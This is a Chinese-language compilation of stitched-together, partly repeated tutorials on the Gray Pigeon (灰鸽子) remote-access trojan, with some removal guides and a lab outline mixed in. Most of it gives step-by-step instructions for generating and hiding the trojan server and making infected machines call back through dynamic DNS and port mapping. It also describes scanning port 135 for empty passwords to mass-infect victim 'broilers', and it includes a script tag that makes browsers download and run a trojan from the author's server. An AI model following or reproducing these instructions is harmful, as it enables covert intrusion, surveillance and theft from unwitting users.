12-反弹端口木马(灰鸽子)的演示

原创作者ｕｎｉｓ远程控制分类与远程协助区别远程控制技术是黑客必学的技术之一。

远程控制不同于远程协助，两者之间有很大的区别，所谓远程协助需要经过被控端的授权允许，并且被控端可以看到控制者的所有操作，使之控制操作透明性；例如我们的QQ远程协助，就需要对方的允许控制进行操作，并且对方也能够看到我们的操作动作，远程协助一般是用来进行远程的计算机操作协助。

远程控制则不一样，远程控制只要在被控者电脑安装一个服务端，即可在不知情的情况下进行控制对方计算机以及对计算机其它操作，控制时不需要经过对方的许可就可以控制，而控制时操作的一些动作，对方也无法察觉到（除鼠标控制）。

远程控制按控制类型可以分类为：（1）正向主动型远程控制（2）反向被动型。

什么是正向主动型的呢？正向主动型是需要控制着主动去连接被控端，一般情况下，控制者必须知道需要被控制者的IP和端口，然后通过某种软件来进行控制被控者，例如微软的3389远程桌面、Radmin远程控制、VNC远程控制都需要知道对方的IP（端口）然后通过客户端软件进行连接对方。

反向被动型控制又可以称为反弹性控制技术，指的是在被控端下安装服务端之后，由被控端主动来寻找你的客户端监听端口软件连接来进行控制，这个好处就是不需要知道对方的IP地址和端口，被控端会自己主动来找我们的监听地址和端口，当我们发现被控端已经找到我们的监听地址和端口，我们就可以控制对方电脑，这样省去要知道对方的IP和端口的麻烦了，特别是对方是动态IP的时候。

反向被动型远控在黑客界已经是主流了，黑客专门使用某些控制软件在控制对方，反弹型远控软件更是数不胜数，例如：花鸽子（灰鸽子）、白金、终结者、Ghost 等等。

远程控制软件的功能与远控木马的特性我们这里主要讲解的是反弹型远控，并且也有讲解到Web型的正向型远控，正向型远控还有Radmin、3389远程桌面也可以值得大家去学习，关于Radmin远控的可以参考我之前写的《深度研究Radmin远控》。

灰鸽子使用教程图解（考虑到灰鸽子技术性较强和传插黑客技术要低调，将网络人远程控制教程放第一部份，灰鸽子教程放在了文章后面第二部份，请大家耐心观看）第一部份：网络人远程监控软件网络人远程控制个人版分为Netman办公版与Netman监控版。

两个版本主要区别在于：Netman办公版连接远程电脑时，对方会弹出提示，知道电脑正在远程连接，主要用于个人远程控制、远程办公、远程协助和远程桌面连接等方面使用，是一款免费的远程控制软件；Netman监控版使用会员登录后再连接，远程电脑无任何提示，对方不会发觉，主要用于监管孩童电脑，掌握孩子上网情况，保护孩子健康上网。

Netman监控版详细安装方法：1.要实现远程监控控制，双方都要安装Netman监控版，双方电脑的安装方法一样，控制端同时也是被控端，只要知道ID和密码，双方可以互相控制。

2.下载软件解压缩后，双击“Netman监控版.EXE”，软件默认安装路径为“C:\Program式，需要自己进入安装文件夹，双击iexplore.exe启动软件，这时会弹出一个提示窗口，问是否要让软件随系统启动，通常直接点“确定”。

3.完成以上操作后，再按ctrl+y即可呼出软件主界面。

监控版必须使用会员登录才能实现监控功能，所以呼出主界面后，应点击免费注册会员。

4.注册好会员后，点“选项”-“会员登录”，填上注册好的会员号。

5.第一次使用会员登录时，会弹出“设置控制密码”选项，需要注意的是，这里修改的不是前面填写的“登录密码”，而是从其他电脑连接本电脑时需要输入的“控制密码”。

很多用户会误以为这里是修改“登录密码”，导致第二次使用会员登录时，发现登录密码不正确。

出于安全考虑，网络人设置了“登录密码”与“控制密码”两道密码保护，“登录密码”用于登录会员ID，“控制密码”则是其他电脑想要控制本地电脑时所需要填写的密码。

想要修改这两个密码，可点击“选项”-“修改密码”。

6.设置好密码密码后，点右上角的关闭按扭，软件就会在后台运行，桌面上看不到任何图标和提示。

Gray pigeons--灰鸽子是什么呢？灰鸽子简单的说它是远程监控软件,（黑客类）,当然也可以说他是一个病毒.木马或则说是后门之类的恶意软件灰鸽子分为2个部分：客户端和服务端,把服务端发出去,别人下载后安装.....(当然也有不需要安装的以及IE版的只要下载[浏览]就中招)而你操纵着鸽子的客户端,你可以任意的操纵别人的电脑...-当然想让别人中招也不是那么容易的现在国内主流的杀毒软件很容易就把它和谐掉了.当然有你有杀毒软件别人也可以做出无视杀毒软件的服务端（简称：免杀），免杀的话那就是杀毒软件查不到那是一个木马程序！鸽子是国内一款著名后门。

比起前辈冰河、黑洞来，灰鸽子可以说是国内后门的集大成者。

其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他后门都相形见绌。

客户端简易便捷的操作使刚入门的初学者都能充当黑客。

当使用在合法情况下时，灰鸽子是一款优秀的远程控制软件。

但如果拿它做一些非法的事，灰鸽子就成了很强大的黑客工具。

这就好比火药，用在不同的场合，给人类带来不同的影响！（其他的我也说不清楚）如果你会使的话那么它可以做很多事。

NB点的黑客可以通过各种渠道得到它想要的东西,。

（如QQ的刷钻刷QB等以及在网络上购买你想买的东西甚至其他更为贵重的物品,都可以通过它做到,当然要自己会用懂用）总之灰鸽子在不同的人手里用法就不同,你可以拿它来逗你朋友,吓唬别人,整蛊别人,也可以拿它来刷QQ钻（前提是需要控制到宽带上网用户）个人对鸽子的认识我对它的了解也不是全面的（现在我把鸽子的假设教程发出来喜欢耍的自己学着架设吧！）------------------------------------架设教程-------------------------------------首先下载灰鸽子-[你可以去百度搜索下载]我这里提供一个下载地址吧！灰鸽子下载：/file/t06ef189fa（不知道这个地址能活多久如果能下载就下吧下不到就自己去百度搜）下好鸽子后解压到任意磁盘或则桌面等任意目录！1.打开 H_Client.exe （鸽子启动程序）（如图）2.去希网注册一个用户信息地址： 如图3.注册好后登录点击【我的控制台】在动态域名(DynamicDNS) 下面有个新建点它如图4.我这有3个那是自己以前建的现在你点了建设后就自己填写一个你想要的数字或则字母组合域名（随便写也可以只要自己可以记住）如图 IP地址如果默认显示的就是你外网IP 如果你是局域网的话那么填写你的本地IP127.0.0.1或则局域网IP也可以，填写好后点【确认】5.下面就下载另外一个软件cn99qdns /file/t0be434e40 下载好后安装它安装方法全部默认如下6.OK 安装完成了默认安装在的路径是 C:\Program Files\cn99qdns 下面打开这个路径 Cn99qdns.exe打开它如图7.点击 Cn99qdns客户端上的管理帐号如图域名：就是第4个步骤叫你新建的动态域名用户：就是第二步叫你注册的用户名口令：第二步注册的那个用户名的密码（注册成功后发到你邮箱的）填写好后点【增加】看到如下图必须显示可用才行如果不可用那么就是希网那的IP错误了自己修正去！出现这个图显示可用后点确认按钮它就托盘了不管他了！---------8.现在什么都搞好了返回灰鸽子软件界面点击软件上的【工具】选择【FTP 服务器】如图9.做了第8步后会弹出个小窗口 FTP服务器填写方法FTP主目录：就是你灰鸽子解压在的目录路径，比如我解压在桌面那就是C:\Documents and Settings\Administrator\桌面\黑防鸽子\服务端口：2121 不用改把那个匿名勾点掉用户名：就是希网注册的用户密码：希网用户的密码填写好后点开启服务如图开启服务后就关掉这个小窗口10.下面点灰鸽子软件上的自动上线按钮如图（点了后会弹出小窗口）弹出小窗口FTP服务器：你在希网新建的域名端口：2121用户名：希网注册的用户名连接类型：PASV登录密码：希网用户名密码密码确认：确认密码然后点【更新IP到FTP空间】显示成功就表示OK 以下是我填写的图自己参考！11.OK了架设就这样基本完成了。

灰鸽子配置内网上线批量扫135端口抓肉鸡设置详细解释加图片说明第一:先打开灰鸽子(如图1)初始界面。

现在开始配置服务端(如图2)其他几项不重要按个人要求来选,主要是填写公网IP、域名填好后生成服务端保存在指定路径！注：本人用的是固定公网IP 所以只需要填写IP 在局域网使用灰鸽子需要做端口映射！介绍一个映射工具=================比特精灵端口映射工具UPnP局域网专用(如图3)===============打开工具以后点下一步它会自动查找UPNP设备 (去掉忽略ICF防火墙前面的勾～)查找出设备后(如图4)下一步开始设置(如图5)设置好后下一步提示添加映射端口成功!(如图6)映射成功后不要关闭工具！==============================================================配置好服务端以后接下来测试一下鸽子是否能上线！只要运行一下(如图7)鸽子配置好测试成功能上线了接下来批量扫135端口抓肉鸡！！用十段S扫描器扫几段IP(如图8)开始以后出现DOS界面扫到的IP全是开135端口的机器(如图9)呵呵还不少呢～～扫完以后DOS界面会自动关系在文件目录下出现一个文档我们用扫描整理器处理一下只保留干净的IP 点“修正并保存文件”处理后在目录下会出现一个的文件！(如图10)找到开135端口的IP 就该用NTscan 这个工具扫135的空口令了！(如图11)就先扫到这里其实还有好多呢！！关闭NTscan以后会在目录下自动建出一个的文件里面还是未经过处理的IP需要把没用的字符去掉保留干净的IP 这里我们用记事本自带的替换功能就可以完成！不用说大家因该都会。

处理后的IP 连空格都需要去掉！(如图12)筛选出开135端口空口令的IP以后需要用一个批量开23端口的工具把这些IP的23端口全部打开！(如图13)点开始工具会自动批量开23端口程序运行还是在DOS界面下处理开好23端口后DOS窗口自动关闭,接下来用端口过滤工具把开好的23端口再次过滤在抓肉鸡的时候更加准确！把刚才找到的文件后缀改成lst为呵呵这个工具只能后缀lst的文件所以要改一下后缀改好后打开工具导入开始过滤！(如图14)下一步导出过滤好的IP另存为文件！操作到这里已经一大半了全是批量处理还不是累就是耗时间接下来是最重要的部分了就是批量传马了废话不多说继续！我们先用Serv-U架设一个FTP 以后在传马的时候会用上(用别人的FTP空间也可以去免费空间申请一个就行本人是自己架设的空间别人的不稳定权限设置的很严格不能上传EXE文件或是下载上传带宽做了限制比较慢)架设FTP我想大家也都会我也就不介绍了！(如图15)是我简单架设的FTPFTP架设好以后配置一下JS脚本！(如图16)安装批量传马的工具安好后运行配置(如图17)打来—>选项—>全局选项—>编辑默认设置—>选正编写好的JS脚本下一步运行批量传马工具填写配置基本和批量开23端口类似！(如图18)填写好以后点开始工具自动运行JS脚本批处理传马呵呵现在鸽子提示已经有肉鸡让线了不过不是很多因为我的小马没有做免杀！可怜～～看看有3只肉鸡了！(如图19)哈哈还有一个德国小鸡～～下一步运行批量传马工具填写配置基本和批量开23端口类似！(如图18)填写好以后点开始工具自动运行JS脚本批处理传马呵呵现在鸽子提示已经有肉鸡让线了不过不是很多因为我的小马没有做免杀！可怜～～看看有3只肉鸡了！(如图19)哈哈还有一个德国小鸡～～==============此文章只供参考学习若使用给别人带来损失本人概不负责==============OK教程到此结束，请不要用于非法用途哦。

浏览网页中木马的原理和防范--灰鸽子网页木马的制作和解析1.网页木马从原理如果你访问××网站（国内某门户网站），你就会中灰鸽子木马。

这是我一黑客朋友给我说的一句说。

打开该网站的首页，经检查，我确实中了灰鸽子。

怎么实现的呢？他说，他侵入了该网站的服务器并在网站主页上挂了网页木马；一些安全专家常说，不要打开陌生人发来的网址，为什么？因为该网址很有可能就是一些不怀好意者精心制作的网页木马。

以上只是网页木马的两种形式，实际上网页木马还可以挂在多媒体文件（RM、RMVB、WMV、WMA、Flash）、电子邮件、论坛等多种文件和场合上。

很可怕吧，那么用户如何防范网页木马呢？下面我们就先从网页木马的攻击原理说起。

一、网页木马的攻击原理首先明确，网页木马实际上是一个HTML网页，与其它网页不同的是该网页是黑客精心制作的，用户一旦访问了该网页就会中木马。

为什么说是黑客精心制作的呢？因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞，让IE在后台自动下载黑客放置在网络上的木马并运行（安装）这个木马，也就是说，这个网页能下载木马到本地并运行（安装）下载到本地电脑上的木马，整个过程都在后台运行，用户一旦打开这个网页，下载过程和运行（安装）过程就自动开始。

有朋友会说，打开一个网页，IE浏览器真的能自动下载程序和运行程序吗？如果IE真的能肆无忌惮地任意下载和运行程序，那天下还不大乱。

实际上，为了安全，IE浏览器是禁止自动下载程序特别是运行程序的，但是，IE浏览器存在着一些已知和未知的漏洞，网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。

下面我举IE浏览器早期的一个漏洞来分别说明这两个问题。

⒈自动下载程序<SCRIPT LANGUAGE="icyfoxlovelace" src="hxxp:///1.exe"></SCRIPT>小提示：代码说明a. 代码中“src”的属性为程序的网络地址，本例中“/1.exe”为我放置在自己Web服务器上的灰鸽子服务端安装程序，这段代码能让网页下载该程序到浏览它的电脑上。

序：灰鸽子是国内一款著名后门。

比起前辈冰河、黑洞来，灰鸽子可以说是国内后门的老大哥。

其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他后门都相形见绌。

客户端简易便捷的操作使刚入门的初学者都能充当黑客。

当使用在合法情况下时，灰鸽子是一款优秀的远程控制软件。

但如果拿它做一些非法的事，灰鸽子就成了很强大的黑客工具。

灰鸽子是一款反弹连接式的木马。

现在上网一般是通过ADSL宽带拨号上网、modem上网、无线上网等等多种上网方式，有些是直接处于公网上的，但是也有很多都是用路由划分一个或多个vlan，通过NAT共用一个公网IP地址上网。

所以这些用的IP都是内网IP。

如果肉鸡中了灰鸽子的服务端，需要反弹回来连接灰鸽子客户端的8000端口。

但是，拨号上网的IP不是固定不变而是动态IP，每次获得的IP都是不一样的；或者客户端的IP是一个内网IP。

这个时候服务端就不知道该怎么去找到客户端并且连接客户端的8000端口了。

（8000端口是灰鸽子的默认端口，这个端口是可以更改的）要让鸽子的服务端每次都能找到客户端，反过来说就要让客户端的IP可以让服务端每次都可以找得到。

不管客户端位于公网还是内网，让服务端找得到的方法其实是一样的。

内网上线或者外网上线的方法有很多种：可以绑定一个DDNS 域名（动态域名），可以在路由器上做端口映射，也可以用鸽子自带的vport工具做端口映射……总之方法很多，设置也很简单。

如果有路由器的控制权呢可以进入路由器做鸽子的端口映射。

如果没有路由器的控制权呢，只能找一个有着公网IP地址的肉鸡来做端口映射了。

因为我的上网环境是处在一个局域网，通过交换机和路由器公用一个公网IP上网，又不能获得路由器的控制权，所以我要讲的是vidc这个工具。

因为用这个vidc最大的优点就是永远不会被杀毒软件查杀，这个vidc根本就不在杀毒软件的打击范围，这个不是我一个人说的，是很多黑客老前辈说的，并且我也亲身做过实验，用360杀毒、瑞星和国外杀软avast都进行过扫描，全部都是正常。

灰鸽子病毒（Backdoor.Gpigeon）介绍及清除方法-电脑资料
灰鸽子的特点是“三个隐藏”——隐藏进程、隐藏服务、隐藏病毒文件，。

灰鸽子2005感染系统后，将自身注册为系统服务，并在同一目录下生成一组（3个）隐藏的病毒文件.
HijackThis是荷兰学生merijn开发系统扫描工具，能够扫描系统版本，进程，启动项，服务项等信息，对于分析解决IE浏览器问题,以及分析病毒，木马问题有很大帮助
HijackThis扫描的log可用记事本打开。

用HijackThis 1.99.1 扫描系统信息，可以帮助解决问题
下载地址:
扫描出的结果很多都是无害的甚至是正常系统必须的,如果不是非常有把握，请勿修改!
使用方法: 解压到一个文件夹，运行HijackThis“扫描系统并保存日志”，把日志文件保存到桌面，然后用记事本打开那个文件,找到病毒所在处.
复以下项目：O23 - NT 服务: pms (Portable Media Serial) - Unknown owner - C:/WINDOWS/IEXPL0RE.EXE !
修复后重启电脑，全盘杀毒，
电脑资料
《灰鸽子病毒(Backdoor.Gpigeon)介绍及清除方法》(https://www.)。

在“安全模式”下，在“文件夹选项”的“查看”面板中勾选“显示系统文件夹内容”、“显示所有文件及文件夹”两个选项，按“确定”按钮。

根据HijackThis日志中提示的病毒文件所在路径，找到病毒文件，删除之。

重启系统，手工杀毒即告完成。

实战录一次对顽固灰鸽子的查杀朋友电脑中了木马，因为在异地，所以有了这次不很方便的查杀。

她用的是卡巴，卡巴也报出了病毒GAAKEY.DLL，显示是鸽子“HUPIGON”。

不过进程里没有IE。

我记得灰鸽子是往IE里边插的，让她用卡巴查杀了一下内存，汗，好多的病毒。

插入了EXPLORER等众多进程中，而且卡巴无法删除。

也是，那些进程都用着呢。

对方是个MM，电脑小白的MM，远控总是断。

费尽九牛二虎之力让她明白了如何进入安全模式。

当时我是这么想的，肯定还有GAAHOOK.DLL，GAA.EXE这样的文件在%systemroot%下边。

所以叮嘱她进入安全模式以后找这三个东东，然后删除掉。

没想到的是她找不到，当时电话联系着。

问，你看你C盘下有没有BOOT.INI什么文件，显示颜色有点淡的（就是隐藏文件，之前已经叫她把系统那些保护和隐藏文件都显示了的）？答曰：无。

看来木马用了手段，这些看不到。

让她重启回来，QQ上给她“System Repair Engineer”。

使用“智能扫描”，按下“扫描”按钮进行扫描，扫描完成后按下“保存报告”按钮保存报告日志文件（SREng.LOG），把保存的报告日志文件给我。

我一看发现有GADMIN GADMINISTRATOR 两个服务。

把System Repair Engineer和KILLBOXE.exe给准备好，然后我把文本发给她，让她保存到桌面，进安全模式进行删除。

文本内容如下：＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝重新启动电脑, 开机检测完后, 不停按[F8]键(可以一直按到启动菜单出来为止), 选择安全模式进入Windows，这个你应该可以操作了。

运行(双击)System Repair Engineer(就是我给你那个“SREng.exe”），点启动项目，服务，然后点“Win32服务应用程序”。

勾选“隐藏微软服务”，好了，然后要选择病毒服务了。

选中病毒服务Gadmin / GAadministrator，选择“删除服务”点“设置”选择“否”双击打开KillBox.exe，分别删除C:\WINDOWS\GAadminC:\WINDOWS\GAaKey.DLLc:\windows\gaa.dll(这个找不到或者没有删除都没有关系，等下交给杀毒软件就可以搞定的了。

灰鸽子的使用方法！鸽子突然发现好多人在问灰鸽子的使用方法、今天就说一下、自己摸爬滚打的方法经验吧、咯咯~❤那个、先说一下大体的步骤吧、不然会晕掉的（PS：当时自己摸索时就晕了、后来才发现其实也没那么麻烦、呼~）首先申请个动态域名然后下载个域名客户端、再然后用客户端更新域名的ip、再再然后就到、鸽子的“配置服务程序”里面的IP项填写自己的域名等再再再然后设置好其他选项、点击生成服务端就可以了！这样当别人运行你的服务端时就被你控制了以上就是设置使用的大体步骤~还有配置里面的一些信息根据自己需要做更改当然不改也是可以的不过、在这之前要先判断一下你是内网还是外网判断内、外网的方法是：你上网之前是不是要拨号（拨号的东西应该都知道吧、咯咯~不知道、就是比我还菜）、要拨号的就是外网、不然就是内网呗、学校的都会是内网、如果你是内网的、就要做下8000端口的映射（映射选项在灰鸽子上面有自己找到映射一下就好、不再多说了）、不然肉鸡是不会不上线的~好了该说具体步骤了：1：申请动态域名→我用的是花生壳、因为当时找不到免费的动态域名（PS：可能当时太菜了吧）自己感觉挺好用、貌似那个希网动态域名也不错（也就是大家说的3322）嘻嘻~ 先到这里申请一个动态域名解析花生壳/这是网址、点免费域名、当然你要是有钱就可以点别的、嘻嘻~点一下、下面会变成这个样子把你想好的名字输入、选择后缀、看看有没有被注册如果未被注册、那么这一步就OK了！如果被注册了、应该知道该咋办吧？2：然后下载域名客户端。

好了、域名准备就算完成了、3：下载灰鸽子。

→当时自己的灰鸽子是在太平洋软件下载中心下载的、现在论坛里面就有、可能有些刚注册的新会员、贡献不够、不能下载使用、那我就做个老好人给大伙备一个好了、嘻嘻~哎、我真的是个大好人啊！咯咯~（声明：以下的灰鸽子图片不是我的、因为本本、没联网、截图不方便、就用家里的电脑、所以不能把自己的小鸽子、给大家拿来看、图片是我从网上down下来的、可能有些模样颜色不太一样、但总的设置步骤和过程是一样的、大家就凑合看吧！！呼呼~）先来个宏观的、看一下鸽子长什么模样、接下来、开始配置吧、①打开小鸽子、单击【文件】下的配置服务程序、有些版本直接就有、自己随便啦、如下图②按照下图填入相关的服务参数、（这张图简直是太完美了、不需要我再多说什么了、）红圈圈那个保存路径、自己随便就行、生成服务器就是放在这里的、（把这个东东发给别人就可以控制他了）③设置在大肉鸡电脑上安装的选项如图→安装路径可以随便改、文件名也是可以随便改的、→图标选择：这个无所谓、想换成什么样子随你便这两个、如果你不想被别人发现你在他电脑上运行木马、就不要打√了、这个是为了隐藏的、注意要打√！！④服务端启动项配置！还是看图吧、这个图依旧很完美、找了好多、就它最好！咯咯~上图的保存路径、跟开始讲到那个是一个问题、所以一定要注意、要一致、不然可真就乱了、⑤：其他选项的设置继续看上图、那些个、代理服务、高级选项、插件功能、可以不用设置（PS：我是没管它们）、⑥点击、生成服务器该设置的就设置好了、就可以点击生成服务器了、生成的服务器就保存在上面的、保存路径里面、把它发送出去、谁点击了谁就成为你的肉鸡了。

灰鸽子远程控制完整详细教程（考虑到灰鸽子技术性较强和传插黑客技术要低调，将网络人远程控制教程放第一部份，灰鸽子教程放在了文章后面第二部份，请大家耐心观看）第一部份：网络人远程监控软件Netman监控版详细安装方法：1.要实现远程监控控制，双方都要安装Netman监控版，双方电脑的安装方法一样，控制端同时也是被控端，只要知道ID和密码，双方可以互相控制。

2.下载软件解压缩后，双击“Netman监控版.EXE”，软件默认安装路径为“C:\Program Files\Netman”，可以自己修改，但安装路径需要记住，因为启动软件桌面上不会新建快捷方式，需要自己进入安装文件夹，双击iexplore.exe启动软件，这时会弹出一个提示窗口，问是否要让软件随系统启动，通常直接点“确定”。

3.完成以上操作后，再按ctrl+y即可呼出软件主界面。

监控版必须使用会员登录才能实现监控功能，所以呼出主界面后，应点击免费注册会员。

4.注册好会员后，点“选项”-“会员登录”，填上注册好的会员号。

5.第一次使用会员登录时，会弹出“设置控制密码”选项，需要注意的是，这里修改的不是前面填写的“登录密码”，而是从其他电脑连接本电脑时需要输入的“控制密码”。

很多用户会误以为这里是修改“登录密码”，导致第二次使用会员登录时，发现登录密码不正确。

出于安全考虑，网络人设置了“登录密码”与“控制密码”两道密码保护，“登录密码”用于登录会员ID，“控制密码”则是其他电脑想要控制本地电脑时所需要填写的密码。

想要修改这两个密码，可点击“选项”-“修改密码”。

6.设置好密码密码后，点右上角的关闭按扭，软件就会在后台运行，桌面上看不到任何图标和提示。

想要再次操作软件，请按下ctrl+y键。

右上角的关闭按扭只是将软件界面关闭，想要彻底退出软件，应点击左上角的“文件”-“退出”。

很多用户想要卸载软件时，发现无卸载，就是因为没有退出程序造成。

7.有同样的方法在另一台电脑安装Netman监控版并使用另一个会员登录，在“远程IP/ID”处输入对方的会员ID和控制密码，点击“连接”即可连接远程电脑。

灰鸽子病毒的原理和运行方式是怎么样的灰鸽子远程病毒我想谁都不陌生吧?曾经控制着我们电脑，信息恶意传播，你知道灰鸽子病毒的原理和运行方式吗?下面由店铺给你做出详细的灰鸽子病毒的原理和运行方式介绍!希望对你有帮助!灰鸽子病毒的原理和运行方式介绍：灰鸽子远程监控软件分两部分：客户端和服务端。

黑客(姑且这么称呼吧)操纵着客户端，利用客户端配置生成出一个服务端程序。

服务端文件的名字默认为G_Server.exe，然后黑客通过各种渠道传播这个服务端(俗称种木马)。

种木马的手段有很多，比如，黑客可以将它与一张图片绑定，然后假冒成一个羞涩的MM通过QQ把木马传给你，诱骗你运行;也可以建立一个个人网页，诱骗你点击，利用IE漏洞把木马下载到你的机器上并运行;还可以将文件上传到某个软件下载站点，冒充成一个有趣的软件诱骗用户下载……，这正违背了我们开发灰鸽子的目的，所以本文适用于那些让人非法安装灰鸽子服务端的用户，帮助用户删除灰鸽子 Vip 2005 的服务端程序。

本文大部分内容摘自互联网。

G_Server.exe运行后将自己拷贝到Windows目录下(98/xp下为系统盘的windows目录，2k/NT下为系统盘的Winnt目录)，然后再从体内释放G_Server.dll和G_Server_Hook.dll到windows目录下。

G_Server.exe、G_Server.dll和G_Server_Hook.dll三个文件相互配合组成了灰鸽子服务端，有些灰鸽子会多释放出一个名为G_ServerKey.dll的文件用来记录键盘操作。

注意，G_Server.exe这个名称并不固定，它是可以定制的，比如当定制服务端文件名为A.exe 时，生成的文件就是A.exe、A.dll和A_Hook.dll。

Windows目录下的G_Server.exe文件将自己注册成服务(9X系统写注册表启动项)，每次开机都能自动运行，运行后启动G_Server.dll 和G_Server_Hook.dll并自动退出。

灰鸽子木马原理
灰鸽子木马原理
灰鸽子木马是一种常见的网络攻击手段，它的原理是通过植入恶意代码，控制被攻击计算机的行为，从而达到攻击者的目的。

下面将详细
介绍灰鸽子木马的原理。

1. 植入恶意代码
灰鸽子木马的第一步是植入恶意代码。

攻击者可以通过各种方式将恶
意代码植入到目标计算机中，比如通过电子邮件、网络钓鱼等方式。

一旦恶意代码被植入到计算机中，它就会开始执行攻击者的指令。

2. 控制被攻击计算机
一旦恶意代码被植入到计算机中，攻击者就可以通过远程控制的方式
控制被攻击计算机的行为。

攻击者可以利用被攻击计算机的资源，比
如计算能力、存储空间等，进行各种恶意活动，比如发起DDoS攻击、窃取敏感信息等。

3. 隐藏行踪
为了避免被发现，攻击者通常会采取一些措施来隐藏自己的行踪。

比如，他们可能会使用代理服务器或虚拟专用网络（VPN）来隐藏自己的IP地址，或者使用加密技术来保护通信内容，使其难以被监测和识别。

总之，灰鸽子木马是一种非常危险的网络攻击手段，它可以给受害者带来严重的损失。

为了保护自己的计算机安全，我们应该时刻保持警惕，不要轻易打开来路不明的邮件和链接，同时也要安装好杀毒软件和防火墙，及时更新系统和软件补丁，以提高自己的计算机安全防护能力。

反弹端口型木马分析了防火墙的特性后发现：防火墙对于连入的链接往往会进行非常严格的过滤，但是对于连出的链接却疏于防范。

于是，与一般的木马相反，反弹端口型木马的服务端（被控制端）使用主动端口，客户端（控制端）使用被动端口，木马定时监测控制端的存在，发现控制端上线立即弹出端口主动连结控制端打开的主动端口，为了隐蔽起见，控制端的被动端口一般开在80，这样，即使用户使用端口扫描软件检查自己的端口，发现的也是类似 TCP UserIP:1026ControllerIP:80 ESTABLISHED的情况，稍微疏忽一点你就会以为是自己在浏览网页。

（防火墙也会这么认为的，我想大概没有哪个防火墙会不给用户向外连接80端口吧，嘿嘿）看到这里，有人会问：那服务端怎么能知道控制端的IP地址呢？难道控制端只能使用固定的IP地址？哈哈，那不是自己找死么？一查就查到了。

实际上，这种反弹端口的木马常常会采用固定IP的第三方存储设备来进行IP地址的传递。

举一个简单的例子：事先约定好一个个人主页的空间，在其中放置一个文本文件，木马每分钟去GET一次这个文件，如果文件内容为空，就什么都不做，如果有内容就按照文本文件中的数据计算出控制端的IP和端口，反弹一个TCP链接回去，这样每次控制者上线只需要FTP一个INI文件就可以告诉木马自己的位置，为了保险起见，这个IP地址甚至可以经过一定的加密，除了服务和控制端，其他的人就算拿到了也没有任何的意义。

对于一些能够分析报文、过滤TCP/UDP的防火墙，反弹端口型木马同样有办法对付，简单的来说，控制端使用80端口的木马完全可以真的使用HTTP协议，将传送的数据包含在HTTP的报文中，难道防火墙真的精明到可以分辨通过HTTP协议传送的究竟是网页还是控制命令和数据？下面我说一些我的经验，一般使用反弹型木马，比如灰鸽子，你可以先申请一个免费主页空间，里面建立一个文件，然后配置灰鸽子读取里面的数据，你每次上线后修改这个文件，让他指向你的Ip，就可以了，你的肉鸡自动连接到你的机器。

木马灰鸽子防护场景灰鸽子是国内一个著名的后门程序。

灰鸽子变种木马运行后，会自我复制到Windows目录下，并自行将安装程序删除。

修改注册表，将病毒文件注册为服务项实现开机自启。

木马程序还会注入所有的进程中，隐藏自我，防止被杀毒软件查杀。

自动开启IE浏览器，以便与外界进行通信，侦听黑客指令，在用户不知情的情况下连接黑客指定站点，盗取用户信息、下载其它特定程序。

通过对灰鸽子的运行过程及原理进行了解，掌握对木马的防御实验目标●掌握木马的原理●通过木马对主机控制过程的了解，掌握防御方法●树立安全的防范意识●可以根据环境要求设定有效的防范策略实验拓扑VM Server VM Client实验环境Server：Windows XP[服务端]（因实验需要 Server 服务端登录账户：administrator，密码：123456）Client：Windows XP[客户端]灰鸽子[企业版]Server_Setup.exe服务端木马(可由灰鸽子生成)灰鸽子专杀工具[工具]利用灰鸽子进行控制灰鸽子木马程序版本众多，这里我们选择了使用较多的“灰鸽子远程管理企业版Build060228”版本。

【注释】安装灰鸽子客户端程序，目的为了控制被种植了灰鸽子服务端程序的肉鸡，客户端本身没有危害性。

1.在客户端上运行“灰鸽子[企业版]”程序，主界面如图 1：(图1)2.点击工具栏中的“配置服务程序”按钮，弹出如图2对话框，可根据自己要求定制生成服务端程序，用于种植在肉鸡中。

(图2)【注释】用户可以定制肉鸡服务端开放的端口、连接密码、控制权限等。

自动上线功能可以在肉鸡启动时，自动告知控制者上线信息。

3.添加好相应的信息后,点击“生成服务器”按钮，可以生成EXE可执行程序。

这里我们在C盘根目录已经提供了一个生成好的服务端程序Server_Setup.exe，其连接端口为7812，连接密码为7812，具有所有控制权限。

4.把生成的Server_Setup.exe通过网络共享方式复制至服务端上，并在服务器上双击运行该程序。

灰鸽子上线方法总结引言:灰鸽子上线主要分为内网上线和外网上线其中内网上线又可以分为拥有路由器控制权的内网上线(如宿舍)和没有路由器控制权的内网上线(如网吧,学校机房),内网上线必须经过端口映射到外网iP才能够进行上线.无忧路由器控制权(网吧,机房)---------映射--------外网ip(肉鸡映射)有路由器控制权(宿舍)------映射内网ip------路由器修改路由器映射方法:Cmd命令-----ipconfig(查看自己的内网ip和路由地址)---进入路由器192.1683.1.1----默认账号密码admin admin-----转发规则----8000端口(灰鸽子上线端口)+192.168.1.113(内网ip)------保存如果转发端口较多可以添加DMZ主机,将会把所有端口转发.虚拟机内网上线映射方法,需要将网络连接方式改为bridge,ip地址则会变为192.168.1.xx。

如果是Nat链接方式则为10.5.1.xx 。

无法上线。

内网映射完成以后，则会变为外网ip，然后上线方法则和ADSL拨号上网一样，下面是配置上线的方法。

123.235.84.80动态ip（内网和ADSL拨号上网一般为动态ip每次重启计算机或是重新拨号都会发生ip的改变），所以动态ip应该与动态域名配合使用。

下面是常见的动态域名及使用方法：一、花生壳动态域名需要下载客户端，登录客户端以后，每次ip转换以后，更新一下即可。

鸽子配置上线地址，则填花生壳的域名如二、希网动态域名希网也是动态域名，下载客户端，每次更新一下ip即可，当然也可以登录希网网站进行ip重新设置。

三、5944FTP空间需要FTP更新，更新地址为自己的FTP空间76.73.69.61或账号和密码为FTP账号密码，更新地址可以为内网ip如192.168.1.113:8000或者为外网ip如123.235.84.80：8000，然后鸽子上线地址为FTP空间加ip.txt如/ip.txt四．自己搭建FTP服务器上线此方法不是很容易，因为ip随时改变，以后再加详细教程。

三个我在网上找了好几天的木马—冰河、黑洞、灰鸽子（供菜鸟学习用）实在是不会像几位大大们那么发东西，所以我就简单的说一下吧今天给大家上传几个木马，不过提前说好，学习基础用的实验木马，现在可以说是很多人都说他们是过时的，所以不好找，而且基本杀毒软件都把其列为必杀的，但是我想说的是这是基础的东西，任何一本黑客教材都会介绍的东西，技术可能会过时，但是他们代表这一种思想，永远都不会过时。

